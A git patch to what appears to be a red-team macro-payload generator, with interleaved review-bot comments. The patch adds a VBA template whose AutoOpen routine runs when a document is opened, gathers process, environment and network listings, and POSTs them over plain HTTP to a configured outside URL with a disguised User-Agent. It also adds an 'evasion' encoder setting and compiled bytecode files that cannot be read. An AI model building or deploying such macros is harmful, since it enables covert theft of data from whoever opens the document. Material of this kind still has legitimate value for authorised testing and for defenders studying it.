From a28e7089db05ccdbb890604c61bf8cd1bdd35762 Mon Sep 17 00:00:00 2001
From: chamilton
Date: Wed, 9 Aug 2017 16:56:40 -0400
Subject: [PATCH] updated recon template
---
configs/recon.json | 14 ++++++++++++++
lib/__init__.pyc | Bin 0 -> 157 bytes
lib/encoder.pyc | Bin 0 -> 6211 bytes
lib/helper.pyc | Bin 0 -> 4835 bytes
templates/payloads/recon-template.vba | 13 ++++++++++++-
5 files changed, 26 insertions(+), 1 deletion(-)
create mode 100755 configs/recon.json
create mode 100644 lib/__init__.pyc
create mode 100644 lib/encoder.pyc
create mode 100644 lib/helper.pyc
diff --git a/configs/recon.json b/configs/recon.json
new file mode 100755
index 0000000..b061256
--- /dev/null
+++ b/configs/recon.json
@@ -0,0 +1,14 @@
+{
+ "description": "Recon payload",
+ "template": "templates/payloads/recon-template.vba",
+ "varcount": 150,
+ "encodingoffset": 4,
+ "chunksize": 200,
+ "encodedvars": {
+ "URL":"http://ringzer0team.com"
+ },
+ "vars": [],
+ "evasion": ["encoder"],
+ "payload": ""
+}
+
diff --git a/lib/__init__.pyc b/lib/__init__.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..0161095fbb4b7950065c6c67e80709aa1f65c29c
GIT binary patch literal 157 zcmZSn%**vJuQ@WA0SXv_v;z`WgATsrtzoiA6c7 z#d;ZuxtTd7`FZ;3nI)+ynI-zZi8-0cnfax~zKO|2`R=KCsYQt;`9=CUnMwNb@tJv< cCGqik1(hWnK%;DO^HWN5Qtdz%76UN@0PJ}sz5oCK literal 0 HcmV?d00001
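Review bot: The `URL` value under `encodedvars` in configs/recon.json is a committed default that names a real third-party domain over plain `http://`. Any build that leaves the config untouched produces a document that sends the host's process, environment and network listing there unencrypted (the POST itself is in the recon-template.vba hunk). A shared config should not carry a live destination; commit an obviously invalid placeholder such as `"URL": "https://REPLACE-ME.invalid/"` and state in the description that it must be set per engagement to a collector the tester controls. The same commit also adds three `.pyc` files under lib/; compiled bytecode cannot be reviewed in a diff and is normally kept out of the tree with a `*.pyc` ignore rule.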
diff --git a/lib/encoder.pyc b/lib/encoder.pyc new file mode 100644 index 0000000000000000000000000000000000000000..c69791a4899b73f9d51364329bddd98a48b2ccf3 GIT binary patch literal 6211 zcmcgwZC4w|6`olkfn)?Wc7q+`RwYg%yD7x&Y3Yk!+8CPTw9$vvIdKE#>{;&)uteI0 zot1+d^ojh6_H+M9|4~1;&GXz@A)xk&KUlW4!`+$LnLE$D_nA9W`FFGN-}L0GNR|I8 z`1=Pu_V*}a{Iu#RwRtLQwW&w-p4#+OjNg=sE9yI?PL%p;v%+t>?JB-c{)c~^VjAK` z8fCG`Pv`Ma_X!^R4-^J7$fy{DLuwAjfjkjL!*5nO6`N`*u8J_N;+hCEDxMahuHqRH z8Y-@fa7o1t5oT3?LvQd^c7O%u0I(y^9)(J<~fdx!5l@JK>;L$oxH%7PDwB>jInn z%}7I%7DXKmpPJ%vmhL3GGK$loXrf``C@H#o**6<`p5<*KDr#HP+wnPJ8;>jO2Bg)! ztZ!DMy)f??yRsMdlU|XftGh{I;-pyp0&9qpY+%0#qdfc6q$UrGEMM&<&sJq+CSN&t zQE)jykfccw1O(9%Af@a2M|we5^b(#(v!;B+!0bpX5P3Fqr1ZILCvlL8sCyLy@0ubQ z*(PxK(GM*VQ~J~$=?tPRzk#+>P!~S5=D{iPdQNjLND%j_xxfxTvJ+XtCCm^W9GEl? zI0v<}bXcY5o$`F4y+!$l5D@Z1PaWN(`s>?w)UcwCJyk$aL{Ei*QpS_Wi+Eo{|HGzw zf^J<|R|mbZL=G*^813cqH_Kzcfl6mPHai43|Fgl)4ji0fHYg4T1*Su|PXrYDzw^q# zO}mH+OXpO&rknah2Muj{3Jrtc=pk_ckpLs0bK(J@yF`m@fzt5|@Ioihi&qj0`VF-@ zyb6R!$Ml?zWpIA`bZh1Aqo> z0Y-SM7;^eDBF{{}jM~xzZ-5JLy@Xk~7&_W$mjhgsWp9Sum3Zq2F@3uwaEJ`=qCW^0 zW7ZKznS_t{^al?7N``#RbueoY^U6|$4YuFzN?Oq1XBSpN2P094Xa5TV-4#FK1aKk9 z0G_9*`2XTMA;xM64a=Kj+4+3 z3CX9;kdx%V7fAw(VC3ex$*qYCcFn_d*NC?X=i9<%ExRTSD03=wiL<`sCluWmBt#d# z+!e(?MI&Swl1s?oqMPuWI7BiD4?fjP=xqhcSjMbESl0Aq-SC$5ue^D^;zcBEK3ujq z1liX)1PqBy!sVhTQ={ON1=&8B9r>993i943iJvy@rYEOUVBc{qAI8%*dx2lf5WOf6` zh20T@W$gB_xDA_q{L`VVYl9&VW1;^&&6oF3^OXx@!vx!wig%P z@|W@6ruUx-t=oKkpT!c34^T)hz$k)K_{7e?gF?ejC^IvTt0SxV0p2D<6wVgGs509Z@t{oFEKF#%*DnU zrQfjlEef$}oZz%-9X9vb@&Lsoa5--(roU%R<@1nr!Aw4>Y7(mWzr?_Q9%%p*5g|UO z!T4*ufUolFqm4_Bbx2cE)FVjUVaEf{;o-?o+CgulDE$Qna2!U%$th(_T5_9!FXdV!?3)bOm?A z55RD1Ks~6Y%BvxF+2r_s5!u-yl0DpnA(_K97`Bb0VYxBjG7R8db1C2Ywo$|BR}M5p zUkp=M$1^}4gRU`!L`}ohT*96+jh5N61-lWh-I{!pjR_O2VeZ4edV+MuEeZP-6U2^w zmG-YQDPTD>-gVs5UHi!eHK;-gJpsVHYL!VXt^hBW`{F+2E9LImZ8Np%NXixM4brc9 zfh89d>q)=mQqOC&4{v)~f3&TxP;;{(n?r(1nn|e@OH0=Ik>z_`#%MigEnAv;x!I7v ztq)pq5t{r5x1kcITL1!rn%~ 
zyP@m)J!HEz@0PxaczM^G({tW}$RFvZ*YMg`(NEIZAV|Z$34+4q0sSl<^ziC)r}TMY z;M2s87k*6Xr!1HQ_$?McXYnzMdn{I22)?8)!Q@Y2&l;bJh0lF&jD|>WE|c*wxG;ik zL8y84dc9Jgs@LjOJQe((lTzf_s#AkJ>O6t_jPnEtlT%VKzwc0fNLLqHo7MR5eGefE B?>hhh literal 0 HcmV?d00001 diff --git a/lib/helper.pyc b/lib/helper.pyc new file mode 100644 index 0000000000000000000000000000000000000000..8ebfa3757653aabccde93acc7fd383995473dd1d GIT binary patch literal 4835 zcmcIoU2_yg6z$nfLUu_2DItgm?FYI_v5Q!iRcKjYfPiHdY9b=R)YN3BH#=l@CQSDR zQw2}>=+E*W`L3RGdv>!5zOf{IbEmtfKh8b(W2pbR-25wl`KYI=e|7x5j%L4xNbnn| zOsUO@9;nS=++S0hHI?9ZP9=5qn^G^8dbC;RI~%Qeyr2G!e_gi#^^VE*OgY&mK-YI@ z_IC(_4P;R+7jPjiQWIso^yWOb;n0Fg=0!Q8k_Ax~RdPg>hDsJiX{w|l%2AaxMOjkG zQBjsvvLwnel`M;LTqVauIibRh)^VPSC|qq{>DBOe+*Ud88N~BIJy$A%qSTXsmky}a zL`$VR!ub_I;5ECgIY>tlmpl7{#&>a^o6;?z@25CRlh~OXAX*-4#AQrB6>y1ld*+4Zpy}53-P*2?JlVD<0%lFkl|&Zf*eP$ zSF`X8a_lNqK9HWd31DK;YPz6B%5*K|y%On<#e# z;-_2T#@&0}+0v0WJB#+ec)W!{@8Up(4k`@vfSkfub$OZ;ci77eB2HV*ED`N~ndWX| z)aw~*XL=Jy!`&|nZnQc+$a_;a11zdj$$+hP~lollyrOqn|b(U*6IZ7wBeF zTxAgP7GtPz6h^`als6qT7|}GEor7RRel-~}j7@GcWg~{g$CtKnb|1|Mfq0j2YzVXv zL1q!?c%YBarkTafc?H3rO!v&9L}m!oJ21eDKpmV`$RAITHH2~)j^@-N5q?07x{Z+N zlL(Lb#3C-zuoAvPc7-&>l-UXI_Nd=CbC!D8oy7ps8!EDzY2x$Fcgs_d|z)=4$3jf`*2J$~!Ud&3dx6oK64rRnn`RAH>%v=6 z(``$|BIJ?Mf-WcQsho_H3SW-x#cm+QFX}Sud|$DL(u_VEIeif zWyoB24XrACPX?!gxms_G*#x)mG3DSap#x|n6MzDleEN8ppBaZKDS^k-%6)u7P(uYg z?i9Z9${xXI9>Lov2uz|~p>4cxGy!c}(pR9hKAHAMS#}^3WF{$@q;|J09~j{U%$CUY zti&gPfa&=-K{R|HQ)Y#v#M2ENp7HbsHmaglJvfV)b&71HfAZ!NR0}*z*jOobe)S+g z;g{|zXs?it;|%f;>c2#cBLPOjy-@?$hh|Ty4+i8HA*eSGkL3S(B;Y zJU<|7%lOWj50($(5EJVvXMF|n>lHEn*rirr@ta%kD%hIg**h4F4%^k#%G#Z$Z>xu5 zL0-1&2=!+IcmvF-!mh-U9pEBZmIk)%87U8@(Bb>UauzUf%?D^z)pj;$F~Ep5qlku$ zBC%Z*4dqJ}_T)!lNLI>sVo1w|44WZK(L*;58T3QRG9;k{uJ9vj!Xj>bcp=f=*#8p9 z_X$mB&qFK(3$?~VqtU3#&m80;p644!@OR0dfe?o$DTLjZsiDp6gaYt49@1~g3`v4Z I0e))#0O!0SS^xk5 literal 0 HcmV?d00001 diff --git a/templates/payloads/recon-template.vba b/templates/payloads/recon-template.vba index 2f8ae42..3947764 100644 
--- a/templates/payloads/recon-template.vba
+++ b/templates/payloads/recon-template.vba
@@ -3,12 +3,23 @@
 [use:env_list]
 [use:network_list]
+
+Sub AutoOpen()
+ env_query()
+End Sub
+
 Function env_query() As String
 Dim env_query1 As String
+ Set env_query2 = CreateObject(decode("{[MSXML2.ServerXMLHTTP]}"))
 env_query1 = process_list()
 env_query1 = env_query1 & Chr(10) & env_list()
 env_query1 = env_query1 & Chr(10) & network_list()
- env_query = env_query1
+ decode(env_query1)
+
+ URL = decode("[URL]")
+ env_query2.Open "POST", URL, False
+ env_query2.setRequestHeader decode({["User-Agent", "Mozilla/4.0 (compatible; Recon MSIE 6.0; Windows NT 5.0)"]})
+ env_query2.send(env_query1)
 End Function
 Function process_list() As String
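Review bot: Nothing in the template says that `env_query`, which used to return the collected text, now posts it to the configured URL, or that the new `AutoOpen` sub triggers that as soon as the document is opened. Add a header comment above `Sub AutoOpen()`, for example `' Runs on document open: collects process, environment and network listings and POSTs them to [URL] from configs/recon.json.` The function is also still declared `As String` although the line assigning `env_query` was removed, so the signature no longer matches what it does. The same comment should record that the request goes through MSXML2.ServerXMLHTTP with the fixed User-Agent shown in the hunk, since both are observable in proxy and endpoint logs and help the defending team on an engagement attribute the traffic. `process_list` begins on the last line of the hunk and continues outside it.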